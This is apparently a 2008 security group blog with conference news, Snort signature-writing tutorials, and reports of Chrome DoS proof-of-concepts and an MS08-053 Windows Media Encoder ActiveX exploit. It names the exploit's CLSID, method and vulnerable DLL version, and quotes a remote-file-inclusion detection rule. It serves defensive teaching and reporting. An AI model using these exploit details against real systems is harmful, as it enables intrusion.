We now have a patchTuesday Proof-of-Concept release page for the helpers to release 0day's on patchTuesdays. John Smith just released an 0day in this section. For more Click Here.
- EF
Sunday, September 28, 2008
Saturday, September 27, 2008
XCon joined EvilFingers Media Partner List
Hi readers,
We are proud to announce that XCON is our new MEDIA partner. We are glad that our media partners have increased starting from the great magazine Hakin9 and now pairing with the great conferences such as DeepSec 2008, HITB 2008, POC 2008 and now XCon 2008. POC is offering free admissions to EvilFingers team too.
If you gave any questions regarding these conferences, feel free to contact the conference teams. They are the most active and really welcoming community we have ever seen.
Contact us at contact.fingers (@) gmail.com if you have any other questions.
- EF
We are proud to announce that XCON is our new MEDIA partner. We are glad that our media partners have increased starting from the great magazine Hakin9 and now pairing with the great conferences such as DeepSec 2008, HITB 2008, POC 2008 and now XCon 2008. POC is offering free admissions to EvilFingers team too.
If you gave any questions regarding these conferences, feel free to contact the conference teams. They are the most active and really welcoming community we have ever seen.
Contact us at contact.fingers (@) gmail.com if you have any other questions.
- EF
Friday, September 26, 2008
Welcome John Smith!!!
John Smith is our new guy in EvilFingers community. He is now working on the patchTuesday page of EvilFingers community portal. He had some interesting studies on the most recent patchTuesday.
Ion Visser is collaborating with Mr.Smith to analyze the PoC that he is coming up with for pT page. This will be releasing soon at www.EvilFingers.com.
- EF
Ion Visser is collaborating with Mr.Smith to analyze the PoC that he is coming up with for pT page. This will be releasing soon at www.EvilFingers.com.
- EF
EvilFingers made the news once again
ZDNET has published a blog on Google Chrome POC released by EvilFingers on the 23rd Sep 2008. This is the second consecutive DoS released at EvilFingers. Aditya K Sood(Founder of Secniche Security), Team lead of EvilFingers has released the Google Chrome Carriage Return Null Object Memory Exhaustion Remote DoS. First Google Chrome POC was also release by EvilFingers and it made the news at ZDNET, and this was released by Rishi Narang.
EvilFingers is proud to have such team leads who could inspire the whole team and is also thanking the media for all their support. Thanks to Dancho for considering the postings on EvilFingers.
- EF
EvilFingers is proud to have such team leads who could inspire the whole team and is also thanking the media for all their support. Thanks to Dancho for considering the postings on EvilFingers.
- EF
Thursday, September 25, 2008
Microsoft New Downloads: Un-patched
I was researching on some Microsoft stuff & patches and downloaded Media Encoder software. I was worried about the fact that it will be "patched" and I will have to look for a "un-patched" version to get my hands on the vulnerable wmex.dll (9.0.0.2980).
After installing it, I was surprised to see it having a *.2980 version instead of a patched one! Then I downloaded the patch, extracted the files and got the newer *.3359 version. I don't know much about the corporate policies, but I feel, any software by Microsoft should be a "newer" version, specially after the patch tuesday vulnerability exposure!
To me it surely came as a shock in a "goodish" way ;)
/best wishes/
- Ion
After installing it, I was surprised to see it having a *.2980 version instead of a patched one! Then I downloaded the patch, extracted the files and got the newer *.3359 version. I don't know much about the corporate policies, but I feel, any software by Microsoft should be a "newer" version, specially after the patch tuesday vulnerability exposure!
To me it surely came as a shock in a "goodish" way ;)
/best wishes/
- Ion
Wednesday, September 24, 2008
Second Google Chrome POC
The Second POC for Google Chrome released by a EvilFingers Team lead was released yesterday and it still spikes up the Processor for memory utilization and crashes Chrome.
The advisory can be found here.
Warning!!! This is for educational use only.
- EF
The advisory can be found here.
Warning!!! This is for educational use only.
- EF
Tuesday, September 23, 2008
To EvilFingers Team
Power Of Community (POC) 2oo8 is offering extended welcome to the EvilFingers team. This conference is going to be held at Korea. Details are available at POC2008. Right now, EvilFingers Team gets free registration for this conference. Kindly, contact contact.fingers {at} gmail.com to get the ticket.
- EF
- EF
Networking = Job + Pay + Talent
The world is changing for its worse. People in our field (InfoSec) are believing over "networking" more than proven skills. The first question that comes to ones mind is "Whom do you know?" rather than "(What or How) do you know?". This is a very bad trend in the long run. Some people call it as a method of attaining trust. But isn't this the model(Transitivity) that caused failure in trust and multiple gaps in the same.
Is this going to change in a while or will this never change?
- EF
Is this going to change in a while or will this never change?
- EF
Sunday, September 21, 2008
MS08-053 – Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow Analysis Report
Haluznik released MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow at milw0rm website. Ion from EvilFingers has released the
analysis document on the patchTuesday(pT) section of the website.
Read n' Enjoy!!! Let us know if you have any comments or questions @ contact.fingers {at} gmail.com.
- EF
analysis document on the patchTuesday(pT) section of the website.
Read n' Enjoy!!! Let us know if you have any comments or questions @ contact.fingers {at} gmail.com.
- EF
Saturday, September 20, 2008
Call for Reviewers - Kris Kaspersky's Second Edition on Disassembling Uncovered
Kris Kaspersky is writing his book and releasing it on EvilFingers as mentioned in the previous posting "Welcome Kris Kaspersky!!!". We are looking for Language and flow review committee and Technical review committee.
If you wish to contribute or if you have any questions regarding this reviewer position, kindly contact contact.fingers {at} gmail.com.
- EF
If you wish to contribute or if you have any questions regarding this reviewer position, kindly contact contact.fingers {at} gmail.com.
- EF
The Exploit Lab 3.0 Comes to Hack in The Box
Buffer overflows and remote exploits still remain the most wondrous and devastating of attacks. For years, security analysts have been playing with exploits that yield them a rootshell. The Exploit Laboratory brings the "rocket science" of reverse engineering and exploit writing in an easy to understand two day class at Hack In The Box 2008. Started by Saumil Shah of Net-Square and S.K.Chong of Scan Associates, the Exploit Laboratories has been taught at Blackhat, Hack in the Box, CanSecWest and many other security conferences worldwide to sold-out audiences.
The class' popularity lies in the fact that it brings the concepts down to easy hands-on examples featuring real life software as opposed to contrived textbook examples. Participants begin with simple overflows on Windows and Linux and are brought up to speed with exception handler overwrites, heap overflows, exploiting toolbars on IE7, bypassing Vista ASLR, and more, featuring recent software vulnerabilities out in the wild.
For the first time this year, the Exploit Laboratory features hands on Mac OS X exploitation. Saumil and S.K. strive to keep the class current. Things have come a long way since the class was first offered in early 2006. The Exploit Laboratory has kept pace with the times, with a continually updated syllabus and up-to-date examples of vulnerabilities.
It entirely depends upon the participants how much they wish to absorb out of the class. Both instructors are highly experienced security professionals with over nine years of experience in the industry, many public contributions, books and papers. The format of the Exploit Laboratory is "learn as you play along". Participants are expected to bring their own laptops to class. Everything happens hands-on.
The Exploit Laboratory requires its participants to sign a code of ethics agreement to promote vulnerability discovery and responsible disclosure.
Some comments from past students on The Exploit Laboratory:
Garrett Gee writes: "Wow, what a weekend I just had. I just finished the exploit laboratory class with Saumil Shah and S.K. Chong at Black Hat USA 2007. We covered exploit topics like stack and heap overflows on linux and windows systems. At the end of the course, I think we developed ten exploits for various applications. I loved their teaching format of explaining the exploit concept, then stepping us through a real exploit, and then letting us do one ourselves. A major difference from the ImmunitySec course I took a few years ago was that they told us how to make the application crash in the first place. This saved lots of time and allowed us to focus on how to gain full control of the application, and how to pack our payloads."
http://garrettgee.com/2007/07/30/black-hat-exploit-laboratory/
Tate Hansen writes: "If you want to bump up your exploit writing skills – Saumil Udayan Shah is an excellent teacher. His style of teaching brought out memories of my time as an ECE student at CU, Boulder. He presented very clearly, kept the pace moving, and quipped often. Great class. The majority of time is spent on using GDB and WinDBG to inspect Intel 32-bit x86 CPU registers for opportunities. The end game was always accompanied by netcat and metasploit (along with a decent amount of scripting to facilitate quick retries when trying to line up all the
exploit code to ensure success)."
http://blog.clearnetsec.com/articles/2006/08/07/the-exploit-laboratory-class-at-blackhat-training-was-great
More details on the class can be found on the Hack In The Box 2008 conference page at: http://conference.hitb.org/hitbsecconf2008kl
- EF
The class' popularity lies in the fact that it brings the concepts down to easy hands-on examples featuring real life software as opposed to contrived textbook examples. Participants begin with simple overflows on Windows and Linux and are brought up to speed with exception handler overwrites, heap overflows, exploiting toolbars on IE7, bypassing Vista ASLR, and more, featuring recent software vulnerabilities out in the wild.
For the first time this year, the Exploit Laboratory features hands on Mac OS X exploitation. Saumil and S.K. strive to keep the class current. Things have come a long way since the class was first offered in early 2006. The Exploit Laboratory has kept pace with the times, with a continually updated syllabus and up-to-date examples of vulnerabilities.
It entirely depends upon the participants how much they wish to absorb out of the class. Both instructors are highly experienced security professionals with over nine years of experience in the industry, many public contributions, books and papers. The format of the Exploit Laboratory is "learn as you play along". Participants are expected to bring their own laptops to class. Everything happens hands-on.
The Exploit Laboratory requires its participants to sign a code of ethics agreement to promote vulnerability discovery and responsible disclosure.
Some comments from past students on The Exploit Laboratory:
Garrett Gee writes: "Wow, what a weekend I just had. I just finished the exploit laboratory class with Saumil Shah and S.K. Chong at Black Hat USA 2007. We covered exploit topics like stack and heap overflows on linux and windows systems. At the end of the course, I think we developed ten exploits for various applications. I loved their teaching format of explaining the exploit concept, then stepping us through a real exploit, and then letting us do one ourselves. A major difference from the ImmunitySec course I took a few years ago was that they told us how to make the application crash in the first place. This saved lots of time and allowed us to focus on how to gain full control of the application, and how to pack our payloads."
http://garrettgee.com/2007/07/
Tate Hansen writes: "If you want to bump up your exploit writing skills – Saumil Udayan Shah is an excellent teacher. His style of teaching brought out memories of my time as an ECE student at CU, Boulder. He presented very clearly, kept the pace moving, and quipped often. Great class. The majority of time is spent on using GDB and WinDBG to inspect Intel 32-bit x86 CPU registers for opportunities. The end game was always accompanied by netcat and metasploit (along with a decent amount of scripting to facilitate quick retries when trying to line up all the
exploit code to ensure success)."
http://blog.clearnetsec.com/
More details on the class can be found on the Hack In The Box 2008 conference page at: http://conference.hitb.org/
- EF
MS08-053: Analysis Report
As speculated by most of us about the 'Exploit Wednesday', not much have been witnessed since the September Patch Tuesday and it's going to be 2 weeks now. There was an exploit released on MS08-053 as posted before. This surely is an interesting read for all web application lovers as it triggers via a simple ActiveX control and a "GetDetailsString" method.
Last some days I was a little busy, but will release an analysis report in next 24 hrs on some technical details about "wmex.dll" and the vulnerability information. So, stay in touch.
/best-wishes/
Last some days I was a little busy, but will release an analysis report in next 24 hrs on some technical details about "wmex.dll" and the vulnerability information. So, stay in touch.
/best-wishes/
Friday, September 19, 2008
Sandnet - www.EmergingThreats.net
EmergingThreats Sandnet collect tons of new stuff. The latest blog from Matt Jonkman is really interesting. This discusses about an exploit creating MySQL connection and there by logging-in and finally downloading the malicious binaries. More on this could be found at MySQL Command and Control .
- EF
- EF
Hack In The Box (HITB) Security Conference 2008 - Malaysia
The following was displayed in the official HITB website:
Welcome to the official homepage of HITBSecConf2008 - Malaysia. The main aim of our conference is to enable the dissemination, discussion and sharing of deep knowledge network security information. Presented by respected members of both the mainstream network security arena as well as the underground or black hat community, our events routinely highlight new and ground-breaking attack and defense methods that have not been seen or discussed in public before.
HITBSecConf2008 - Malaysia will be our 6th conference in Malaysia and is expected to attract over 1000 attendees from around the Asia Pacific region and from around the world. This year’s event will also see the introduction of a third track to our conference program called the HITB Labs. These new hands-on sessions are designed to give attendees a closer and deeper understanding of various security issues from physical security bypass methods to the security of RFID and other wireless based technologies.
HITBSecConf2008 - Malaysia will also see our highly popular team-based hacking competition known as Capture The Flag. First developed and presented at Defcon in the US, the idea behind a CTF competition is to allow for teams of three to hack into prepared servers running in order to retrieve marked files or flags on these target machines. Participants will also be required to defend their systems from attack. Teams will be judged on both their defensive as well as the offensive game play.
We believe HITBSecConf is an ideal platform for leading network security vendors to not only meet with some of the leading network security specialists but to also showcase their own technology and solutions with the public as well.
Welcome to the official homepage of HITBSecConf2008 - Malaysia. The main aim of our conference is to enable the dissemination, discussion and sharing of deep knowledge network security information. Presented by respected members of both the mainstream network security arena as well as the underground or black hat community, our events routinely highlight new and ground-breaking attack and defense methods that have not been seen or discussed in public before.
HITBSecConf2008 - Malaysia will be our 6th conference in Malaysia and is expected to attract over 1000 attendees from around the Asia Pacific region and from around the world. This year’s event will also see the introduction of a third track to our conference program called the HITB Labs. These new hands-on sessions are designed to give attendees a closer and deeper understanding of various security issues from physical security bypass methods to the security of RFID and other wireless based technologies.
HITBSecConf2008 - Malaysia will also see our highly popular team-based hacking competition known as Capture The Flag. First developed and presented at Defcon in the US, the idea behind a CTF competition is to allow for teams of three to hack into prepared servers running in order to retrieve marked files or flags on these target machines. Participants will also be required to defend their systems from attack. Teams will be judged on both their defensive as well as the offensive game play.
We believe HITBSecConf is an ideal platform for leading network security vendors to not only meet with some of the leading network security specialists but to also showcase their own technology and solutions with the public as well.
Thursday, September 18, 2008
DeepSec2008
Deepsec is an annual European two-day in-depth conference on computer, network, and application security. It is a non-product, non-vendor-biased conference and their aim is to present the best research and experience from the fields' leading experts. The conference program will be augmented with a live hacking competition and a team capture the flag contest.
The DeepSec In Depth Security Conference is happy to announce the preliminary schedule for this year's event from November 11th to 14th in Vienna, Austria.
The schedule which can be found at https://deepsec.net/schedule offers leading edge talks from international speakers on topics including botnet analysis, web application security, malware detection, legal and administrative issues, secure coding and code review, hardware an firmware attacks, and more.
Registration is open at: https://deepsec.net/register/
In addition to the two day conference we offer two days of in-depth workshops on selected topics:
‣ Improving Code with Destructive Data (Heikki Kortti and Jukka Taimisto)
‣ Security Audit and Hardening of Java based Software (Marc Schoenefeld)
‣ The Exploit Laboratory (Saumil Udayan Shah)
‣ Design and Implementation of Security Awareness Campaigns (Stefan Schumacher)
‣ Advanced Malware Deobfuscation (Scott Lambert)
‣ Protocol and Traffic Analysis for Snort Signature (Matt Jonkman)
‣ Secure Application Coding for Enterprise Software (Vimal Patel)
List of speakers with presentations:
‣ Achim Reckeweg ; Sun Microsystems ; Germany
‣ Alex Stamos ; iSEC Partners ; USA
‣ Alexander Kornbrust ; Red Database Security GmbH ; Germany
‣ Andrea Monti ; Studio Legale Monti ; Italy
‣ Arrigo Triulzi ; Independent Security Consultant ; Italy
‣ Chema Alonso, José Parada ; Informática 64 ; Spain
‣ Daniel Mende, Simon Rich ; ERNW GmbH ; Germany
‣ Dr. Anton Chuvakin ; LogLogic, Inc ; USA
‣ Haroon Meer ; SensePost ; South Africa
‣ Heikki Kortti and Jukka Taimisto ; Codenomicon Ltd ; Finland
‣ Jason Steer ; IronPort, a division of Cisco Systems ; UK
‣ Joe Stewart ; SecureWorks ; USA
‣ José Nazario ; Arbor Networks ; USA
‣ Kurt Grutzmacher ; Pacific Gas & Electric ; USA
‣ Luciano Bello ; CITEFA/Si6 , Debian Project ; Argentina
‣ Marc Schoenefeld ; University of Bamberg ; Germany
‣ Matt Jonkman ; Emerging Threats.net (formerly bleedingthreats.net) ; USA
‣ Morgan Marquis-Boire ; Security-Assessment.com ; New Zealand
‣ Neelay S. Shah ; Foundstone Inc., A Division of McAfee ; USA
‣ Paolo Perego ; Spike Reply srl, Owasp Orizon Project leader ; Italy
‣ Peter Panholzer ; SEC Consult Unternehmensberatung GmbH ; Austria
‣ Rafael Dominguez Vega ; MWR InfoSecurity ; UK
‣ Saumil Udayan Shah ; CEO, Net-Square ; India
‣ Scott Lambert, Jason Geffner ; Microsoft, NGSSoftware Ltd. ; USA
‣ Sharon Conheady ; Ernst & Young ; UK
‣ Shreeraj Shah ; Blueinfy Solutions ; India
‣ Simon Roses Femerling ; Microsoft ; Spain
‣ Stefan Schumacher ; Kaishakunin.com ; Germany
‣ Stefano Zanero ; Politecnico di Milano TU
‣ Claudio Criscione ; SecureNetwork Srl ; Italy
‣ VimalPatel ; Founder & Director, Blueinfy Solutions Pvt. Ltd. ; India
‣ Vincenzo Iozzo ; Secure Network ; Italy
‣ Yarochkin Fedor/Meder Kydyraliev ; guard-info ; Kyrgyzstan
‣ Yiannis Pavlosoglou ; Ounce Labs / PhD, OWASP Project Leader ; United Kingdom
‣ fukami ; SektionEins GmbH ; Germany
DeepSec Organisation Team.
https://deepsec.net/contact
- EF
The DeepSec In Depth Security Conference is happy to announce the preliminary schedule for this year's event from November 11th to 14th in Vienna, Austria.
The schedule which can be found at https://deepsec.net/schedule offers leading edge talks from international speakers on topics including botnet analysis, web application security, malware detection, legal and administrative issues, secure coding and code review, hardware an firmware attacks, and more.
Registration is open at: https://deepsec.net/register/
In addition to the two day conference we offer two days of in-depth workshops on selected topics:
‣ Improving Code with Destructive Data (Heikki Kortti and Jukka Taimisto)
‣ Security Audit and Hardening of Java based Software (Marc Schoenefeld)
‣ The Exploit Laboratory (Saumil Udayan Shah)
‣ Design and Implementation of Security Awareness Campaigns (Stefan Schumacher)
‣ Advanced Malware Deobfuscation (Scott Lambert)
‣ Protocol and Traffic Analysis for Snort Signature (Matt Jonkman)
‣ Secure Application Coding for Enterprise Software (Vimal Patel)
List of speakers with presentations:
‣ Achim Reckeweg ; Sun Microsystems ; Germany
‣ Alex Stamos ; iSEC Partners ; USA
‣ Alexander Kornbrust ; Red Database Security GmbH ; Germany
‣ Andrea Monti ; Studio Legale Monti ; Italy
‣ Arrigo Triulzi ; Independent Security Consultant ; Italy
‣ Chema Alonso, José Parada ; Informática 64 ; Spain
‣ Daniel Mende, Simon Rich ; ERNW GmbH ; Germany
‣ Dr. Anton Chuvakin ; LogLogic, Inc ; USA
‣ Haroon Meer ; SensePost ; South Africa
‣ Heikki Kortti and Jukka Taimisto ; Codenomicon Ltd ; Finland
‣ Jason Steer ; IronPort, a division of Cisco Systems ; UK
‣ Joe Stewart ; SecureWorks ; USA
‣ José Nazario ; Arbor Networks ; USA
‣ Kurt Grutzmacher ; Pacific Gas & Electric ; USA
‣ Luciano Bello ; CITEFA/Si6 , Debian Project ; Argentina
‣ Marc Schoenefeld ; University of Bamberg ; Germany
‣ Matt Jonkman ; Emerging Threats.net (formerly bleedingthreats.net) ; USA
‣ Morgan Marquis-Boire ; Security-Assessment.com ; New Zealand
‣ Neelay S. Shah ; Foundstone Inc., A Division of McAfee ; USA
‣ Paolo Perego ; Spike Reply srl, Owasp Orizon Project leader ; Italy
‣ Peter Panholzer ; SEC Consult Unternehmensberatung GmbH ; Austria
‣ Rafael Dominguez Vega ; MWR InfoSecurity ; UK
‣ Saumil Udayan Shah ; CEO, Net-Square ; India
‣ Scott Lambert, Jason Geffner ; Microsoft, NGSSoftware Ltd. ; USA
‣ Sharon Conheady ; Ernst & Young ; UK
‣ Shreeraj Shah ; Blueinfy Solutions ; India
‣ Simon Roses Femerling ; Microsoft ; Spain
‣ Stefan Schumacher ; Kaishakunin.com ; Germany
‣ Stefano Zanero ; Politecnico di Milano TU
‣ Claudio Criscione ; SecureNetwork Srl ; Italy
‣ VimalPatel ; Founder & Director, Blueinfy Solutions Pvt. Ltd. ; India
‣ Vincenzo Iozzo ; Secure Network ; Italy
‣ Yarochkin Fedor/Meder Kydyraliev ; guard-info ; Kyrgyzstan
‣ Yiannis Pavlosoglou ; Ounce Labs / PhD, OWASP Project Leader ; United Kingdom
‣ fukami ; SektionEins GmbH ; Germany
DeepSec Organisation Team.
https://deepsec.net/contact
- EF
Wednesday, September 17, 2008
Security @ its core - The Human Factor
Kevin Mitnick was and is a wonderful hacker who really implemented the situation that shows the human factor in the world of information security. There are many other books and movies that explain the same. Why is still a major factor in insecurity? Well, this has been the case for almost 10,000 years that is ever since humans have started trying to keep their stuff for themselves.
Security is not required if people do not want to have things for themselves. If countries share all their wealth and if people let anyone come into their house and does not account for any products or property that they have then security is not going to be essential in such an environment. But, that is not human. That is when security comes into place in various forms.
Social engineering has played a great role to point out the human factors and weakness in information security. Having read/seen this in many articles, why is there no such thing as complete security? That is because, humans by nature have weakness and ties to something or someone that could be valuable to them. For example, people with secret or top-secret clearance do not share their work or work related data to any of their family members since the first person any bad guy would go against is someone or something that is valuable to you, which could put the nation's security in jeopardy. In general, reconnaissance and scanning are part of social engineering. Though enumeration is the phase on which you would put the meaningful parts together.
Does this mean that people who are in infoSec or CyberWarfare not have any family ties or ties to any valuable things to them or, does this mean that information security can never be complete as long as it involves a human? Think about it...
- EF
Security is not required if people do not want to have things for themselves. If countries share all their wealth and if people let anyone come into their house and does not account for any products or property that they have then security is not going to be essential in such an environment. But, that is not human. That is when security comes into place in various forms.
Social engineering has played a great role to point out the human factors and weakness in information security. Having read/seen this in many articles, why is there no such thing as complete security? That is because, humans by nature have weakness and ties to something or someone that could be valuable to them. For example, people with secret or top-secret clearance do not share their work or work related data to any of their family members since the first person any bad guy would go against is someone or something that is valuable to you, which could put the nation's security in jeopardy. In general, reconnaissance and scanning are part of social engineering. Though enumeration is the phase on which you would put the meaningful parts together.
Does this mean that people who are in infoSec or CyberWarfare not have any family ties or ties to any valuable things to them or, does this mean that information security can never be complete as long as it involves a human? Think about it...
- EF
Tuesday, September 16, 2008
Do HATS change with coloring schemes?
White, black and (white+black)/2 are the 3 hats known so far in the security community. Hollywood has played a great role in building creativity to both sides of hacking. Now when it comes to what humans think, what we might assume is that if a website is dark in color and if the coloring schemes based on black background, then it is a black hat site and the same for white and gray.
Does this really hold good for every website? So if we have a site that is white in background, does that mean that we have a trust worthy site. How does 'human factor' affect the perception of who is good and who is bad based on appearance? Doesn't "appearances are deceptive" hold good in this case too?
Well, this blog was not to give semantics of the hats, but just to give a general idea for people to start thinking about classifying hats. What we would suggest is to have 2 classifications "Good" and "Bad", and forget about black, white and gray hats.
- EF
Does this really hold good for every website? So if we have a site that is white in background, does that mean that we have a trust worthy site. How does 'human factor' affect the perception of who is good and who is bad based on appearance? Doesn't "appearances are deceptive" hold good in this case too?
Well, this blog was not to give semantics of the hats, but just to give a general idea for people to start thinking about classifying hats. What we would suggest is to have 2 classifications "Good" and "Bad", and forget about black, white and gray hats.
- EF
Microsoft Windows WRITE_ANDX SMB command handling Kernel DoS
In reference to: http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm
It was released 2 days back, so, I tried to validate it with my setup. I am running Microsoft Vista with SP1 at the target. On execution from the metasploit framework it did 'nothing' on the service. I have yet to install the "kartoffel" to validate the analysis.
According to the advisory released -
I have already mailed about this to "Vallejo" and hope to get a reply soon. Here is a snaphot of the exploit in execution.A condition exists with srv.sys and npfs.sys wherein a specially crafted WRITE ANDX SMB packet may cause a kernel Denial Of Service.
Monday, September 15, 2008
Signature Writing - 102
As mentioned in the previous post, we look for some repetitive commonness in the malicious packets, once we know that it could only come in the malicious packets for sure. But what are false positives and false negatives in this case. So, if "This is" is not specific to malicious packets alone and if that trace can be seen in good data too, then we call it a false positive. This is because, our signature would trigger alerts not only on the bad data, but on the good ones too. Now if the combination of "This is" and "." is not seen on the same packet then our signature might not trigger an alert. This is a false-negative.
Now, let us see with a real world exploit example from Emergingthreats.net.
Example1:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB TellTarget CMS Remote Inclusion site_conf.php ordnertiefe"; flow:established,to_server; uricontent:"/site_conf.php?"; nocase; uricontent:"ordnertiefe="; nocase; classtype:web-application-attack; reference:cve,CVE-2007-2597; reference:url,www.milw0rm.com/exploits/3885; sid:2003705; rev:2;)
In this example, we see the 2 content's to be the
uricontent:"/site_conf.php?"; nocase; uricontent:"ordnertiefe="; nocase;
and both are case-insensitive. This is the file-frame and the variable that are vulnerable according to CVE-2007-2597. NVD has a good list of CVEs that are linked to other external resources that could give more details on the vulnerabilities. For example, the above CVE links to milw0rm exploit for this vulnerability, the BID number and so on.
Now, further looking into above signature, we see
In this case, we do not require any PCRE(Perl Compatible Regular Expression) since this is a remote file inclusion and this combination alone would be sufficient to catch the vulnerable function when entering the network. But what if there is some developer using this combination in their site and if someone inside the org is accessing that page. It is a false positive in that case, though it is sometimes best for the developers to understand that it is not good to code with the vulnerable variables or file-frames. But this will not happen in the near future as devloper and secure coding is different from a developer having knowledge on intrusion defense.
Rest in the next blog.
- EF
Now, let us see with a real world exploit example from Emergingthreats.net.
Example1:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB TellTarget CMS Remote Inclusion site_conf.php ordnertiefe"; flow:established,to_server; uricontent:"/site_conf.php?"; nocase; uricontent:"ordnertiefe="; nocase; classtype:web-application-attack; reference:cve,CVE-2007-2597; reference:url,www.milw0rm.com/exploits/3885; sid:2003705; rev:2;)
In this example, we see the 2 content's to be the
uricontent:"/site_conf.php?"; nocase; uricontent:"ordnertiefe="; nocase;
and both are case-insensitive. This is the file-frame and the variable that are vulnerable according to CVE-2007-2597. NVD has a good list of CVEs that are linked to other external resources that could give more details on the vulnerabilities. For example, the above CVE links to milw0rm exploit for this vulnerability, the BID number and so on.
Now, further looking into above signature, we see
flow:established,to_server;This means that the connection is established and the direction is "to server".
In this case, we do not require any PCRE(Perl Compatible Regular Expression) since this is a remote file inclusion and this combination alone would be sufficient to catch the vulnerable function when entering the network. But what if there is some developer using this combination in their site and if someone inside the org is accessing that page. It is a false positive in that case, though it is sometimes best for the developers to understand that it is not good to code with the vulnerable variables or file-frames. But this will not happen in the near future as devloper and secure coding is different from a developer having knowledge on intrusion defense.
Rest in the next blog.
- EF
Sunday, September 14, 2008
Signature Writing - 101
Writing signatures has always always been fun and fabulous. Prerequisites for signature writing includes, research and analysis of the core content that has to be detected or prevented when entering the network. Let us start with a simple sample.
Consider the following content(s) to be malicious:
1. This is where I was born.
2. This is what we are looking for.
3. This is good.
Imaging the above to be malicious and find out what is common in all of the above. "This is" repeats in every line. Hence, that could be added as 1 content that could be filtered or detected. Now let us see which other parts are repetitive. "." repeats at the end of each line. Now that could be content 2. If we want to avoid some false positives, we could say that "." follows "This is" in every content. Though, now imagine that this line is not sent in a single line and it could be split into bits and pieces. That would evade our signatures, right. This is how fragmentation can help in IDS evasion. Though, this does not mean that there is no work around for stopping such an evasion from happening.
We will be looking more into Signatures and logs in the forth coming blogs. Thank you for reading our blog.
- EF
Consider the following content(s) to be malicious:
1. This is where I was born.
2. This is what we are looking for.
3. This is good.
Imaging the above to be malicious and find out what is common in all of the above. "This is" repeats in every line. Hence, that could be added as 1 content that could be filtered or detected. Now let us see which other parts are repetitive. "." repeats at the end of each line. Now that could be content 2. If we want to avoid some false positives, we could say that "." follows "This is" in every content. Though, now imagine that this line is not sent in a single line and it could be split into bits and pieces. That would evade our signatures, right. This is how fragmentation can help in IDS evasion. Though, this does not mean that there is no work around for stopping such an evasion from happening.
We will be looking more into Signatures and logs in the forth coming blogs. Thank you for reading our blog.
- EF
Saturday, September 13, 2008
MS08-053 - Exploit released in milw0rm
MS08-053 defined that the vulnerability in the Windows Media Encoder9 could allow remote code execution. Haluznik, an exploit writer published the MS08-053 exploit at milw0rm website.
In this exploit, the exploit writer has used "GetDetailsString"method in the ActiveX class "clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C" and used an ActiveX Control Buffer Overflow PoC to exploit wmex.dll in the Windows Media Encoder.
Kindly, check out the milw0rm website for more details on the exploit.
- EF
In this exploit, the exploit writer has used "GetDetailsString"method in the ActiveX class "clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C" and used an ActiveX Control Buffer Overflow PoC to exploit wmex.dll in the Windows Media Encoder.
Kindly, check out the milw0rm website for more details on the exploit.
- EF
Friday, September 12, 2008
A new approach for DNS bug - Dan Kaminsky
Educating security community alone isn't enough. Dan Kaminsky is now trying other approaches to spread the word on DNS to general public by making a video on DNS updates with his niece (Ms.Sarah). It is a pretty cool video found here:
Sarah on DNS
-EF
Sarah on DNS
-EF
Wednesday, September 10, 2008
Botnet Page - nectarGrid Project
A subsection of the nG project is our botnet listings. These botnet listings are listed in the rules section of EmergingThreats website. What we have planned to do is to create a list of these IPs grouped from the rules and to find the relationship between them and the other botnet C&C IPs around the world. This is not a short term effort and hence it is good to start this effort at the very beginning. We would then analyze these IPs based on open information such as,
We have just started with this page. Some of the sites that has been involved in such efforts are:
Shadow Server
Honeynet
Nepenthes
EmergingThreats
and few others. We would like to acknowledge them for all their contributions to this community, our community.
- EF
- Whois
- IPBlock
- ReverseDNS
- Web Banner
- RWhois
- DNS Graph
We have just started with this page. Some of the sites that has been involved in such efforts are:
Shadow Server
Honeynet
Nepenthes
EmergingThreats
and few others. We would like to acknowledge them for all their contributions to this community, our community.
- EF
Welcome Kris Kaspersky!!!
Kris Kaspersky, the one and only author for 7 different books on reverse engineering, disassembling and debugging (books) and a known security blog writer has now joined EvilFingers.
He will be running www.EvilFingers.ru and also contribute many articles and books(both English and Russian) to our portal. To start with, he is publishing his next book "Hacker Disassembling Uncovered - Second Edition" through EvilFingers.
NOTE: EvilFingers does NOT reserve the copyrights for this book and per Kris Kaspersky, anyone can download, publish or share any of the chapters published here.
Though there are many versions of the same book seen in outside postings, Kris Kaspersky has personally mentioned to EvilFingers that we would do the final review before publishing the final version of the book.
- EF
He will be running www.EvilFingers.ru and also contribute many articles and books(both English and Russian) to our portal. To start with, he is publishing his next book "Hacker Disassembling Uncovered - Second Edition" through EvilFingers.
NOTE: EvilFingers does NOT reserve the copyrights for this book and per Kris Kaspersky, anyone can download, publish or share any of the chapters published here.
Though there are many versions of the same book seen in outside postings, Kris Kaspersky has personally mentioned to EvilFingers that we would do the final review before publishing the final version of the book.
- EF
Geek Alert: Dan Kaminsky on the DNS Bug of 2008
Dan Kaminsky has given some serious speech to our security community. This is pretty serious, though some of the sites stated otherwise in their blogs or forums. Hence, Mr.Kaminsky who has been doing some serious research on DNS stuff since 2004 or so has released a video to express the seriousness of this DNS bug.
Though DNS bug has been of existance since 1990's, why are there bugs at this level? Are immediate patches postponing such vulnerabilities every time or are they really fixing it? We hope to see someone talk about the long term fixing of such DNS bugs.
Kindly, take few minutes of your time and view the following video to understand the seriousness of this bug:
http://in.youtube.com/watch?v=B0dHDD9fFM4&feature=related
PS: This is our NEUTRAL view of the video and we are no way related to the video or the speaker.
- EF
Though DNS bug has been of existance since 1990's, why are there bugs at this level? Are immediate patches postponing such vulnerabilities every time or are they really fixing it? We hope to see someone talk about the long term fixing of such DNS bugs.
Kindly, take few minutes of your time and view the following video to understand the seriousness of this bug:
http://in.youtube.com/watch?v=B0dHDD9fFM4&feature=related
PS: This is our NEUTRAL view of the video and we are no way related to the video or the speaker.
- EF
Monday, September 8, 2008
CSS/Web Designer
We are looking for CSS Personnel who could help our team with a simple design. We prefer not to use any automated tools for developing the site. We are looking for someone who could work with simple notepad. We believe that we could avoid unwanted code by manually coding whatever we could.
Web Design & Website Development
- CSS Personnel
- Animations Specialist
- Content Management Specialist
- Web Designer
